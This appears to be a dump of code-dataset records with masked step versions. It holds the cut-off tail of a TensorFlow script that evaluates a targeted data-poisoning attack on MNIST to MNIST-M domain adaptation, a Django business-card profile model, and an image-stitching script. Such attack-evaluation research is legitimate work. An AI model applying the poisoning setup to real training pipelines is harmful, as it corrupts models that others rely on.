tf.nn.softmax(target_logits_2[i]))) for i in range(NUM_MODELS)]\r\n \r\n gradients_shared = [tape.gradient(adv_loss[i], shared[i].trainable_variables) for i in range(NUM_MODELS)]\r\n [optimizer_shared[i].apply_gradients(zip(gradients_shared[i], shared[i].trainable_variables)) for i in range(NUM_MODELS)]\r\n \r\n return adv_loss\r\n\r\n\r\n@tf.function\r\ndef train_step_erm(main_data, main_labels):\r\n # persistent is set to True because the tape is used more than\r\n # once to calculate the gradients.\r\n \r\n with tf.GradientTape(persistent=True) as tape:\r\n shared_main = [shared[i](main_data, training=True) for i in range(NUM_MODELS)]\r\n \r\n main_logits_1 = [main_classifier_1[i](shared_main[i], training=True) for i in range(NUM_MODELS)]\r\n main_logits_2 = [main_classifier_2[i](shared_main[i], training=True) for i in range(NUM_MODELS)]\r\n \r\n loss = [ce_loss(main_labels, main_logits_1[i]) + ce_loss(main_labels, main_logits_2[i]) for i in range(NUM_MODELS)]\r\n\r\n gradients_shared = [tape.gradient(loss[i], shared[i].trainable_variables) for i in range(NUM_MODELS)]\r\n gradients_main_classifier_1 = [tape.gradient(loss[i], main_classifier_1[i].trainable_variables) for i in range(NUM_MODELS)]\r\n gradients_main_classifier_2 = [tape.gradient(loss[i], main_classifier_2[i].trainable_variables) for i in range(NUM_MODELS)]\r\n \r\n [optimizer_shared[i].apply_gradients(zip(gradients_shared[i], shared[i].trainable_variables)) for i in range(NUM_MODELS)]\r\n [optimizer_main_classifier_1[i].apply_gradients(zip(gradients_main_classifier_1[i], main_classifier_1[i].trainable_variables)) for i in range(NUM_MODELS)]\r\n [optimizer_main_classifier_2[i].apply_gradients(zip(gradients_main_classifier_2[i], main_classifier_2[i].trainable_variables)) for i in range(NUM_MODELS)]\r\n \r\n return loss\r\n\r\nmnist = tf.keras.datasets.mnist\r\n(x_train_mnist_all, y_train_mnist_all), (x_test_mnist_all, y_test_mnist_all) = mnist.load_data()\r\n\r\nx_train_mnist_all = 
np.stack((x_train_mnist_all,)*3, axis=-1)/255.\r\nx_test_mnist_all = np.stack((x_test_mnist_all,)*3, axis=-1)/255.\r\n\r\nmnistm = pkl.load(open('../../../../MNIST_MNIST-m/mnistm_data.pkl', 'rb'))\r\nx_train_mnistm_all = mnistm['train']/255.\r\nx_test_mnistm_all = mnistm['test']/255.\r\n\r\npicked_class = 3\r\npicked_class_next = 8\r\n\r\ntrain_points_class_0 = np.argwhere(y_train_mnist_all == picked_class).flatten()\r\ntrain_points_class_1 = np.argwhere(y_train_mnist_all == picked_class_next).flatten()\r\n\r\ntest_points_class_0 = np.argwhere(y_test_mnist_all == picked_class).flatten()\r\ntest_points_class_1 = np.argwhere(y_test_mnist_all == picked_class_next).flatten()\r\n\r\nx_train_mnist = x_train_mnist_all[np.concatenate([train_points_class_0, train_points_class_1])]\r\ny_train_mnist = y_train_mnist_all[np.concatenate([train_points_class_0, train_points_class_1])]\r\n\r\nx_test_mnist = x_test_mnist_all[np.concatenate([test_points_class_0, test_points_class_1])]\r\ny_test_mnist = y_test_mnist_all[np.concatenate([test_points_class_0, test_points_class_1])]\r\n\r\nx_train_mnistm = x_train_mnistm_all[np.concatenate([train_points_class_0, train_points_class_1])]\r\nx_test_mnistm = x_test_mnistm_all[np.concatenate([test_points_class_0, test_points_class_1])]\r\n\r\nzeros_train = np.argwhere(y_train_mnist == picked_class).flatten()\r\nones_train = np.argwhere(y_train_mnist == picked_class_next).flatten()\r\nzeros_test = np.argwhere(y_test_mnist == picked_class).flatten()\r\nones_test = np.argwhere(y_test_mnist == picked_class_next).flatten()\r\n\r\ny_train_mnist[zeros_train] = 0\r\ny_train_mnist[ones_train] = 1\r\ny_test_mnist[zeros_test] = 0\r\ny_test_mnist[ones_test] = 1\r\n\r\ny_train_mnist = keras.utils.to_categorical(y_train_mnist, NUM_CLASSES_MAIN)\r\ny_test_mnist = keras.utils.to_categorical(y_test_mnist, NUM_CLASSES_MAIN)\r\n\r\nx_target_test = np.load(\"data/\" + METHOD + \"_TARGET_DATA.npy\")\r\ny_target_test = np.load(\"data/\" + METHOD + 
\"_TARGET_LABEL.npy\")\r\ny_target_test_incorrect_label = np.zeros([1, NUM_CLASSES_MAIN])\r\ntarget_correct_label = np.argmax(y_target_test,1).flatten()[0]\r\ny_target_test_incorrect_label[0][(target_correct_label+1)%NUM_CLASSES_MAIN]=1\r\n\r\nif USE_POISON:\r\n\r\n x_poison = np.load(\"data/\" + METHOD + \"_GENERATED_POISON_DATA.npy\")\r\n y_poison = np.load(\"data/\" + METHOD + \"_GENERATED_POISON_LABELS.npy\") \r\n\r\n x_train_mnist = np.concatenate([x_train_mnist, x_poison])\r\n y_train_mnist = np.concatenate([y_train_mnist, y_poison])\r\n \r\nfor epoch in range(EPOCHS):\r\n nb_batches_train = int(len(x_train_mnist)/BATCH_SIZE)\r\n if len(x_train_mnist) % BATCH_SIZE != 0:\r\n nb_batches_train += 1\r\n ind_shuf = np.arange(len(x_train_mnist))\r\n np.random.shuffle(ind_shuf)\r\n \r\n for batch in range(nb_batches_train):\r\n ind_batch = range(BATCH_SIZE * batch, min(BATCH_SIZE * (1+batch), len(x_train_mnist)))\r\n ind_source = ind_shuf[ind_batch]\r\n \r\n ind_target = np.random.choice(len(x_train_mnistm), size=len(ind_source), replace=False)\r\n \r\n x_source_batch = x_train_mnist[ind_source]\r\n y_source_batch = y_train_mnist[ind_source]\r\n \r\n x_target_batch = x_train_mnistm[ind_target]\r\n \r\n train_step_erm(x_source_batch, y_source_batch)\r\n train_discrepancy_1(x_source_batch, y_source_batch, x_target_batch)\r\n train_discrepancy_2(x_target_batch)\r\n \r\n if epoch % 20 == 0: \r\n print(\"Full training Poisoning:\", USE_POISON, \"MNIST->MNIST_M:\", epoch, \"METHOD:\", METHOD, \"\\n\")\r\n print([eval_accuracy_main_cdan(x_target_test, y_target_test_incorrect_label, shared[i], main_classifier_1[i]) for i in range(NUM_MODELS)])\r\n print([eval_accuracy_main_cdan(x_target_test, y_target_test, shared[i], main_classifier_1[i]) for i in range(NUM_MODELS)])\r\n print([eval_accuracy_main_cdan(x_test_mnistm, y_test_mnist, shared[i], main_classifier_1[i]) for i in range(NUM_MODELS)])\r\n if USE_POISON:\r\n print([eval_accuracy_main_cdan(x_poison, y_poison, 
shared[i], main_classifier_1[i]) for i in range(NUM_MODELS)])\r\n print(\"\\n\")\r\n \r\n",
"step-ids": [
1,
3,
4,
5,
7
]
}
|
[
1,
3,
4,
5,
7
] |
from django.db import models
import os
from uuid import uuid4
class Card_profile(models.Model):
    """Profile for a generated digital business-card site.

    Stores the static-site configuration (repository, base URL, markdown
    engine) together with the card owner's identity, contact details and
    optional social-network links.
    """
    def path_and_rename(self, filename):
        """Build the avatar upload path: keep the original file extension
        but replace the name with a random UUID hex string, avoiding
        collisions and leaking the uploader's filename."""
        upload_to = 'uploads'
        ext = filename.split('.')[-1]
        filename = '{}.{}'.format(uuid4().hex, ext)
        return os.path.join(upload_to, filename)
    # Choices for the ``gender`` field.
    MALE = 'M'
    FEMALE = 'F'
    CHOICES_GENDER = (
        (MALE, 'M'),
        (FEMALE, 'F'),
    )
    # Site / repository configuration.
    username = models.CharField(max_length=255, unique=True)
    repository_name = models.CharField(max_length=255, unique=True)
    page_title = models.CharField(max_length=255)
    description = models.CharField(max_length=255)
    baseurl = models.CharField(max_length=255, default="/")
    url = models.URLField(max_length=200, unique=True)
    # Owner identity and contact details (most are optional).
    avatar = models.ImageField(upload_to=path_and_rename, height_field=None, width_field=None,
                               max_length=255, blank=True, null=True)
    first_name = models.CharField(max_length=255)
    last_name = models.CharField(max_length=255)
    gender = models.CharField(max_length=1, choices=CHOICES_GENDER)
    title = models.CharField(max_length=255, blank=True, null=True)
    company = models.CharField(max_length=255, blank=True, null=True)
    email = models.EmailField(max_length=254, unique=True)
    phone = models.CharField(max_length=255, blank=True, null=True)
    website = models.URLField(max_length=200, blank=True, null=True)
    # Optional social-media profile links.
    facebook_url = models.URLField(max_length=200, blank=True, null=True)
    linkedin_url = models.URLField(max_length=200, blank=True, null=True)
    instagram_url = models.URLField(max_length=200, blank=True, null=True)
    pinterest_url = models.URLField(max_length=200, blank=True, null=True)
    twitter_url = models.URLField(max_length=200, blank=True, null=True)
    youtube_url = models.URLField(max_length=200, blank=True, null=True)
    snapchat_url = models.URLField(max_length=200, blank=True, null=True)
    whatsapp_url = models.URLField(max_length=200, blank=True, null=True)
    tiktok_url = models.URLField(max_length=200, blank=True, null=True)
    telegram_url = models.URLField(max_length=200, blank=True, null=True)
    skype_url = models.URLField(max_length=200, blank=True, null=True)
    github_url = models.URLField(max_length=200, blank=True, null=True)
    gitlab_url = models.URLField(max_length=200, blank=True, null=True)
    # Markdown engine used by the generated Jekyll site.
    markdown = models.CharField(max_length=255, default="kramdown")
    def __str__(self):
        """Human-readable representation: the account username."""
        return self.username
|
normal
|
{
"blob_id": "01153a695b4744465b706acb4c417217c5e3cefd",
"index": 3516,
"step-1": "<mask token>\n\n\nclass Card_profile(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.username\n",
"step-2": "<mask token>\n\n\nclass Card_profile(models.Model):\n\n def path_and_rename(self, filename):\n upload_to = 'uploads'\n ext = filename.split('.')[-1]\n filename = '{}.{}'.format(uuid4().hex, ext)\n return os.path.join(upload_to, filename)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.username\n",
"step-3": "<mask token>\n\n\nclass Card_profile(models.Model):\n\n def path_and_rename(self, filename):\n upload_to = 'uploads'\n ext = filename.split('.')[-1]\n filename = '{}.{}'.format(uuid4().hex, ext)\n return os.path.join(upload_to, filename)\n MALE = 'M'\n FEMALE = 'F'\n CHOICES_GENDER = (MALE, 'M'), (FEMALE, 'F')\n username = models.CharField(max_length=255, unique=True)\n repository_name = models.CharField(max_length=255, unique=True)\n page_title = models.CharField(max_length=255)\n description = models.CharField(max_length=255)\n baseurl = models.CharField(max_length=255, default='/')\n url = models.URLField(max_length=200, unique=True)\n avatar = models.ImageField(upload_to=path_and_rename, height_field=None,\n width_field=None, max_length=255, blank=True, null=True)\n first_name = models.CharField(max_length=255)\n last_name = models.CharField(max_length=255)\n gender = models.CharField(max_length=1, choices=CHOICES_GENDER)\n title = models.CharField(max_length=255, blank=True, null=True)\n company = models.CharField(max_length=255, blank=True, null=True)\n email = models.EmailField(max_length=254, unique=True)\n phone = models.CharField(max_length=255, blank=True, null=True)\n website = models.URLField(max_length=200, blank=True, null=True)\n facebook_url = models.URLField(max_length=200, blank=True, null=True)\n linkedin_url = models.URLField(max_length=200, blank=True, null=True)\n instagram_url = models.URLField(max_length=200, blank=True, null=True)\n pinterest_url = models.URLField(max_length=200, blank=True, null=True)\n twitter_url = models.URLField(max_length=200, blank=True, null=True)\n youtube_url = models.URLField(max_length=200, blank=True, null=True)\n snapchat_url = models.URLField(max_length=200, blank=True, null=True)\n whatsapp_url = models.URLField(max_length=200, blank=True, null=True)\n tiktok_url = models.URLField(max_length=200, blank=True, null=True)\n telegram_url = models.URLField(max_length=200, blank=True, null=True)\n 
skype_url = models.URLField(max_length=200, blank=True, null=True)\n github_url = models.URLField(max_length=200, blank=True, null=True)\n gitlab_url = models.URLField(max_length=200, blank=True, null=True)\n markdown = models.CharField(max_length=255, default='kramdown')\n\n def __str__(self):\n return self.username\n",
"step-4": "from django.db import models\nimport os\nfrom uuid import uuid4\n\n\nclass Card_profile(models.Model):\n\n def path_and_rename(self, filename):\n upload_to = 'uploads'\n ext = filename.split('.')[-1]\n filename = '{}.{}'.format(uuid4().hex, ext)\n return os.path.join(upload_to, filename)\n MALE = 'M'\n FEMALE = 'F'\n CHOICES_GENDER = (MALE, 'M'), (FEMALE, 'F')\n username = models.CharField(max_length=255, unique=True)\n repository_name = models.CharField(max_length=255, unique=True)\n page_title = models.CharField(max_length=255)\n description = models.CharField(max_length=255)\n baseurl = models.CharField(max_length=255, default='/')\n url = models.URLField(max_length=200, unique=True)\n avatar = models.ImageField(upload_to=path_and_rename, height_field=None,\n width_field=None, max_length=255, blank=True, null=True)\n first_name = models.CharField(max_length=255)\n last_name = models.CharField(max_length=255)\n gender = models.CharField(max_length=1, choices=CHOICES_GENDER)\n title = models.CharField(max_length=255, blank=True, null=True)\n company = models.CharField(max_length=255, blank=True, null=True)\n email = models.EmailField(max_length=254, unique=True)\n phone = models.CharField(max_length=255, blank=True, null=True)\n website = models.URLField(max_length=200, blank=True, null=True)\n facebook_url = models.URLField(max_length=200, blank=True, null=True)\n linkedin_url = models.URLField(max_length=200, blank=True, null=True)\n instagram_url = models.URLField(max_length=200, blank=True, null=True)\n pinterest_url = models.URLField(max_length=200, blank=True, null=True)\n twitter_url = models.URLField(max_length=200, blank=True, null=True)\n youtube_url = models.URLField(max_length=200, blank=True, null=True)\n snapchat_url = models.URLField(max_length=200, blank=True, null=True)\n whatsapp_url = models.URLField(max_length=200, blank=True, null=True)\n tiktok_url = models.URLField(max_length=200, blank=True, null=True)\n telegram_url = 
models.URLField(max_length=200, blank=True, null=True)\n skype_url = models.URLField(max_length=200, blank=True, null=True)\n github_url = models.URLField(max_length=200, blank=True, null=True)\n gitlab_url = models.URLField(max_length=200, blank=True, null=True)\n markdown = models.CharField(max_length=255, default='kramdown')\n\n def __str__(self):\n return self.username\n",
"step-5": "from django.db import models\nimport os\nfrom uuid import uuid4\n\n\nclass Card_profile(models.Model):\n\n def path_and_rename(self, filename):\n upload_to = 'uploads'\n ext = filename.split('.')[-1]\n filename = '{}.{}'.format(uuid4().hex, ext)\n\n return os.path.join(upload_to, filename)\n\n MALE = 'M'\n FEMALE = 'F'\n\n CHOICES_GENDER = (\n (MALE, 'M'),\n (FEMALE, 'F'),\n )\n\n username = models.CharField(max_length=255, unique=True)\n repository_name = models.CharField(max_length=255, unique=True)\n page_title = models.CharField(max_length=255)\n description = models.CharField(max_length=255)\n baseurl = models.CharField(max_length=255, default=\"/\")\n url = models.URLField(max_length=200, unique=True)\n avatar = models.ImageField(upload_to=path_and_rename, height_field=None, width_field=None,\n max_length=255, blank=True, null=True)\n first_name = models.CharField(max_length=255)\n last_name = models.CharField(max_length=255)\n gender = models.CharField(max_length=1, choices=CHOICES_GENDER)\n title = models.CharField(max_length=255, blank=True, null=True)\n company = models.CharField(max_length=255, blank=True, null=True)\n email = models.EmailField(max_length=254, unique=True)\n phone = models.CharField(max_length=255, blank=True, null=True)\n website = models.URLField(max_length=200, blank=True, null=True)\n facebook_url = models.URLField(max_length=200, blank=True, null=True)\n linkedin_url = models.URLField(max_length=200, blank=True, null=True)\n instagram_url = models.URLField(max_length=200, blank=True, null=True)\n pinterest_url = models.URLField(max_length=200, blank=True, null=True)\n twitter_url = models.URLField(max_length=200, blank=True, null=True)\n youtube_url = models.URLField(max_length=200, blank=True, null=True)\n snapchat_url = models.URLField(max_length=200, blank=True, null=True)\n whatsapp_url = models.URLField(max_length=200, blank=True, null=True)\n tiktok_url = models.URLField(max_length=200, blank=True, null=True)\n 
telegram_url = models.URLField(max_length=200, blank=True, null=True)\n skype_url = models.URLField(max_length=200, blank=True, null=True)\n github_url = models.URLField(max_length=200, blank=True, null=True)\n gitlab_url = models.URLField(max_length=200, blank=True, null=True)\n markdown = models.CharField(max_length=255, default=\"kramdown\")\n\n def __str__(self):\n return self.username\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import time
import numpy as np
import matplotlib.pyplot as plt
import cv2
import matplotlib.image as mpimg
import random
import skimage
import scipy
from PIL import Image
def readimg(dirs, imgname):
    """Load ``dirs + imgname`` from disk and return it as a grayscale image.

    cv2.imread returns channels in BGR order, so the BGR->GRAY conversion
    must be used here; the original COLOR_RGB2GRAY applied the red and blue
    luminance weights to the wrong channels.
    """
    img = cv2.imread(dirs + imgname)
    img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    return img
def readimg_color(dirs, imgname):
    """Load ``dirs + imgname`` and return it as floats normalized to [0, 1]."""
    raw = cv2.imread(dirs + imgname)
    return cv2.normalize(raw.astype('float'), None, 0.0, 1.0, cv2.NORM_MINMAX)
def sift_descriptor(img):
    """Detect SIFT keypoints on *img* and compute their descriptors."""
    detector = cv2.xfeatures2d.SIFT_create()
    keypoints, descriptors = detector.detectAndCompute(img, None)
    return keypoints, descriptors
def show_sift(kp, img):
    """Display *img* with the keypoints *kp* drawn on top of it."""
    canvas = img.copy()
    canvas = cv2.drawKeypoints(img, kp, canvas)
    plt.imshow(canvas)
    plt.show()
def calculate_distance(kp1, kp2, dsp1, dsp2, num_threshold):
    """Match SIFT descriptors between two images by squared Euclidean distance.

    Every descriptor pair whose squared distance is below *num_threshold* is
    treated as a match.  Returns an (n, 4) array whose rows are
    (x1, y1, x2, y2) keypoint coordinates of the matched pairs.

    Raises if no pair is under the threshold (empty coordinate arrays cannot
    be concatenated along axis 1), same as the original behavior.
    """
    # Explicit submodule import: a bare ``import scipy`` (as at the top of
    # this file) does not make ``scipy.spatial`` available.
    from scipy.spatial.distance import cdist

    # Pairwise squared distances between all descriptors, computed in C.
    dist = cdist(dsp1, dsp2, 'sqeuclidean')
    # One np.where call yields both index arrays of the matching pairs.
    idx1, idx2 = np.where(dist < num_threshold)
    coord1 = np.array([kp1[i].pt for i in idx1])
    coord2 = np.array([kp2[i].pt for i in idx2])
    # Stack into (x1, y1, x2, y2) rows.
    return np.concatenate((coord1, coord2), axis=1)
def get_errors(matches, H):
    """Squared reprojection error of each match under homography *H*.

    Each img1 point is lifted to homogeneous coordinates, projected through
    H, dehomogenized, and compared against its matched img2 point.  Returns
    an array of squared Euclidean distances, one per match row.
    """
    num_pairs = len(matches)
    # Homogeneous coordinates of all img1 points: (x, y, 1).
    p1 = np.concatenate((matches[:, 0:2], np.ones((1, num_pairs)).T), axis=1)
    # Matching img2 points.
    p2 = matches[:, 2:4]
    # Transform every point in p1 to estimate p2.
    transformed_p1 = np.zeros((num_pairs, 2))
    for i in range(num_pairs):
        # Project through H once and dehomogenize (the original computed
        # the matrix product twice per iteration).
        proj = np.matmul(H, p1[i])
        transformed_p1[i] = (proj / proj[-1])[0:2]
    # Squared distance between predicted and actual img2 points.
    errors = np.linalg.norm(p2 - transformed_p1, axis=1) ** 2
    return errors
def compute_H(subset):
    """Fit a 3x3 homography to (x1, y1, x2, y2) pairs via DLT + SVD.

    Builds the standard direct-linear-transform system (two rows per
    correspondence), takes the right-singular vector of the smallest
    singular value as the flattened homography, and normalizes so that
    H[2, 2] == 1.
    """
    rows = []
    for x1, y1, x2, y2 in subset:
        p1 = (x1, y1, 1)
        # Row constraining the y-coordinate of the projection.
        rows.append([0, 0, 0,
                     p1[0], p1[1], p1[2],
                     -y2 * p1[0], -y2 * p1[1], -y2 * p1[2]])
        # Row constraining the x-coordinate of the projection.
        rows.append([p1[0], p1[1], p1[2],
                     0, 0, 0,
                     -x2 * p1[0], -x2 * p1[1], -x2 * p1[2]])
    A = np.array(rows)
    _, _, V = np.linalg.svd(A)
    H = V[-1].reshape(3, 3)
    # Homographies are defined up to scale; fix the scale convention.
    return H / H[2, 2]
def show_inlier_matches(img1, img2, inliers):
    """Display the two grayscale images side by side with lines joining
    each inlier correspondence."""
    print("num of inliers shown in the matching: " + str(len(inliers)))
    height1, width1 = img1.shape
    height2, width2 = img2.shape
    canvas = np.zeros((max(height1, height2), width1 + width2), np.uint8)
    canvas[:, :width1] = img1
    canvas[:height2, width1:] = img2
    fig, ax = plt.subplots()
    ax.imshow(canvas)
    # Shift the img2 x-coordinates by width1 so the line endpoints land
    # on the right half of the composite.
    ax.plot([inliers[:, 0], inliers[:, 2] + width1],
            [inliers[:, 1], inliers[:, 3]])
    plt.show()
def ransac(img1, img2, matches, thres_ransac):
    """Estimate the homography mapping img1 points onto img2 with RANSAC.

    For 1000 iterations: fit H to a random 4-match subset, count the
    inliers whose squared reprojection error is below *thres_ransac*, and
    keep the H with the most inliers.  Prints the inlier count / average
    residual and displays the inlier matches before returning the best H.
    """
    itertimes = 1000
    max_inliners = 0
    # Initialized so a pathological run (no usable hypothesis) raises a
    # clear error later instead of a NameError.
    best_H = None
    which_inliners = None
    avg_residual = 0.0
    for _ in range(itertimes):
        subset_idx = random.sample(range(matches.shape[0]), k=4)
        subset = matches[subset_idx]
        H = compute_H(subset)
        # A degenerate sample (e.g. collinear points) yields a singular H.
        if np.linalg.matrix_rank(H) < 3:
            continue
        # Reprojection error of every match under this hypothesis.
        errors = get_errors(matches, H)
        idx = np.where(errors < thres_ransac)[0]
        inliners = len(idx)
        # Require at least one inlier: the original divided by ``inliners``
        # unconditionally and crashed on a zero-inlier hypothesis.
        if inliners >= max_inliners and inliners > 0:
            which_inliners = matches[idx].copy()
            max_inliners = inliners
            best_H = H.copy()
            # Reuse the already-computed errors instead of re-projecting.
            avg_residual = errors[idx].sum() / inliners
    print("num of inliners: " + str(max_inliners) + " average residual: " + str(avg_residual))
    show_inlier_matches(img1, img2, which_inliners)
    return best_H
# function provided by Maghav at Piazza @450
def warp_images(image0, image1, H):
    """Warp *image1* into *image0*'s frame with homography *H* and blend.

    Computes an output canvas large enough to hold image0 plus the warped
    image1, warps both onto it, and averages pixels where they overlap.
    Returns the mosaic as a uint8 RGB numpy array.
    """
    transform = skimage.transform.ProjectiveTransform(H)
    warp = skimage.transform.warp
    r, c = image1.shape[:2]
    # Note that transformations take coordinates in (x, y) format,
    # not (row, column), in order to be consistent with most literature
    corners = np.array([[0, 0],
                        [0, r],
                        [c, 0],
                        [c, r]])
    # Warp the image corners to their new positions
    warped_corners = transform(corners)
    # Find the extents of both the reference image and the warped
    # target image
    all_corners = np.vstack((warped_corners, corners))
    corner_min = np.min(all_corners, axis=0)
    corner_max = np.max(all_corners, axis=0)
    output_shape = (corner_max - corner_min)
    # Extents are (x, y); skimage expects (rows, cols), hence the reversal.
    output_shape = np.ceil(output_shape[::-1])
    # Translate so the minimum corner maps to the canvas origin.
    offset = skimage.transform.SimilarityTransform(translation=-corner_min)
    # cval=-1 marks pixels that fall outside each warped image, so coverage
    # can be counted below; the cval=0 variants carry the pixel data summed.
    image0_ = warp(image0, offset.inverse, output_shape=output_shape, cval=-1)
    image1_ = warp(image1, (transform + offset).inverse, output_shape=output_shape, cval=-1)
    image0_zeros = warp(image0, offset.inverse, output_shape=output_shape, cval=0)
    image1_zeros = warp(image1, (transform + offset).inverse, output_shape=output_shape, cval=0)
    # overlap counts how many source images cover each pixel (0, 1 or 2);
    # zero-coverage pixels are bumped to 1 to avoid division by zero.
    overlap = (image0_ != -1.0 ).astype(int) + (image1_ != -1.0).astype(int)
    overlap += (overlap < 1).astype(int)
    merged = (image0_zeros+image1_zeros)/overlap
    # Round-trip through PIL to produce a uint8 RGB array from the [0,1]
    # float mosaic.
    im = Image.fromarray((255*merged).astype('uint8'), mode='RGB')
    im = np.asarray(im)
    return im
def main(leftimg, rightimg, leftimgcolor, rightimgcolor):
    """Stitch the color right image onto the color left image.

    SIFT descriptors are matched between the grayscale inputs, a
    homography is estimated with RANSAC, and the color images are warped
    and blended into one panorama, which is returned.
    """
    # using 7000, 0.5 for 2 pic; 9000, 1.0 for 3 pic
    match_threshold = 9000
    ransac_threshold = 1.0
    keypoints_left, descriptors_left = sift_descriptor(leftimg)
    keypoints_right, descriptors_right = sift_descriptor(rightimg)
    # All descriptor pairs closer than the threshold become match candidates.
    matches = calculate_distance(keypoints_left, keypoints_right,
                                 descriptors_left, descriptors_right,
                                 match_threshold)
    homography = ransac(leftimg, rightimg, matches, ransac_threshold)
    return warp_images(rightimgcolor, leftimgcolor, homography)
def main_2pic():
    """Stitch the two 'park' images and display the resulting panorama."""
    data_dir = 'MP3_part1_data/' + 'park/'
    grey_left = readimg(data_dir, 'left.jpg')
    grey_right = readimg(data_dir, 'right.jpg')
    color_left = readimg_color(data_dir, 'left.jpg')
    color_right = readimg_color(data_dir, 'right.jpg')
    panorama = main(grey_left, grey_right, color_left, color_right)
    plt.imshow(panorama)
    plt.show()
def main_3pic():
    """Stitch three overlapping images: left+middle first, then the result
    with the right image, displaying each intermediate panorama."""
    data_dir = 'MP3_part1_data/' + 'pier/'  # ledge pier hill
    grey_left = readimg(data_dir, '1.jpg')
    grey_mid = readimg(data_dir, '2.jpg')
    grey_right = readimg(data_dir, '3.jpg')
    color_left = readimg_color(data_dir, '1.jpg')
    color_mid = readimg_color(data_dir, '2.jpg')
    color_right = readimg_color(data_dir, '3.jpg')
    # First pass: left + middle.
    first_pass = main(grey_left, grey_mid, color_left, color_mid)
    plt.imshow(first_pass)
    plt.show()
    # Second pass: the first panorama + right image (needs a grayscale
    # version of the stitched result for feature matching).
    first_pass_grey = cv2.cvtColor(first_pass, cv2.COLOR_RGB2GRAY)
    second_pass = main(first_pass_grey, grey_right, first_pass, color_right)
    plt.imshow(second_pass)
    plt.show()
if __name__ == '__main__':
    # Entry point: run the three-image stitch; switch to main_2pic() for
    # the two-image dataset.
    #main_2pic()
    main_3pic()
|
normal
|
{
"blob_id": "e08ab06be0957e5e173df798742abc493eac84d0",
"index": 6006,
"step-1": "<mask token>\n\n\ndef readimg(dirs, imgname):\n img = cv2.imread(dirs + imgname)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n return img\n\n\ndef readimg_color(dirs, imgname):\n img = cv2.imread(dirs + imgname)\n img = cv2.normalize(img.astype('float'), None, 0.0, 1.0, cv2.NORM_MINMAX)\n return img\n\n\ndef sift_descriptor(img):\n sift = cv2.xfeatures2d.SIFT_create()\n kp, dsp = sift.detectAndCompute(img, None)\n return kp, dsp\n\n\n<mask token>\n\n\ndef calculate_distance(kp1, kp2, dsp1, dsp2, num_threshold):\n dist = scipy.spatial.distance.cdist(dsp1, dsp2, 'sqeuclidean')\n idx1 = np.where(dist < num_threshold)[0]\n idx2 = np.where(dist < num_threshold)[1]\n coord1 = np.array([kp1[idx].pt for idx in idx1])\n coord2 = np.array([kp2[idx].pt for idx in idx2])\n match_coords = np.concatenate((coord1, coord2), axis=1)\n return match_coords\n\n\n<mask token>\n\n\ndef compute_H(subset):\n A = []\n for i in range(subset.shape[0]):\n p1 = np.append(subset[i][0:2], 1)\n p2 = np.append(subset[i][2:4], 1)\n row1 = [0, 0, 0, p1[0], p1[1], p1[2], -p2[1] * p1[0], -p2[1] * p1[1\n ], -p2[1] * p1[2]]\n row2 = [p1[0], p1[1], p1[2], 0, 0, 0, -p2[0] * p1[0], -p2[0] * p1[1\n ], -p2[0] * p1[2]]\n A.append(row1)\n A.append(row2)\n A = np.array(A)\n U, s, V = np.linalg.svd(A)\n H = V[len(V) - 1].reshape(3, 3)\n H = H / H[2, 2]\n return H\n\n\ndef show_inlier_matches(img1, img2, inliers):\n print('num of inliers shown in the matching: ' + str(len(inliers)))\n h1, w1 = img1.shape\n h2, w2 = img2.shape\n vis = np.zeros((max(h1, h2), w1 + w2), np.uint8)\n vis[:, :w1] = img1\n vis[:h2, w1:] = img2\n fig, ax = plt.subplots()\n ax.imshow(vis)\n ax.plot([inliers[:, 0], inliers[:, 2] + w1], [inliers[:, 1], inliers[:, 3]]\n )\n plt.show()\n\n\ndef ransac(img1, img2, matches, thres_ransac):\n itertimes = 1000\n inliners = 0\n max_inliners = 0\n for iter in range(0, itertimes):\n subset_idx = random.sample(range(matches.shape[0]), k=4)\n subset = matches[subset_idx]\n H = 
compute_H(subset)\n if np.linalg.matrix_rank(H) < 3:\n continue\n errors = get_errors(matches, H)\n idx = np.where(errors < thres_ransac)[0]\n inlinerspts = matches[idx]\n inliners = len(inlinerspts)\n if inliners >= max_inliners:\n which_inliners = inlinerspts.copy()\n max_inliners = inliners\n best_H = H.copy()\n avg_residual = sum(get_errors(matches[idx], H)) / inliners\n print('num of inliners: ' + str(max_inliners) + ' average residual: ' +\n str(avg_residual))\n show_inlier_matches(img1, img2, which_inliners)\n return best_H\n\n\ndef warp_images(image0, image1, H):\n transform = skimage.transform.ProjectiveTransform(H)\n warp = skimage.transform.warp\n r, c = image1.shape[:2]\n corners = np.array([[0, 0], [0, r], [c, 0], [c, r]])\n warped_corners = transform(corners)\n all_corners = np.vstack((warped_corners, corners))\n corner_min = np.min(all_corners, axis=0)\n corner_max = np.max(all_corners, axis=0)\n output_shape = corner_max - corner_min\n output_shape = np.ceil(output_shape[::-1])\n offset = skimage.transform.SimilarityTransform(translation=-corner_min)\n image0_ = warp(image0, offset.inverse, output_shape=output_shape, cval=-1)\n image1_ = warp(image1, (transform + offset).inverse, output_shape=\n output_shape, cval=-1)\n image0_zeros = warp(image0, offset.inverse, output_shape=output_shape,\n cval=0)\n image1_zeros = warp(image1, (transform + offset).inverse, output_shape=\n output_shape, cval=0)\n overlap = (image0_ != -1.0).astype(int) + (image1_ != -1.0).astype(int)\n overlap += (overlap < 1).astype(int)\n merged = (image0_zeros + image1_zeros) / overlap\n im = Image.fromarray((255 * merged).astype('uint8'), mode='RGB')\n im = np.asarray(im)\n return 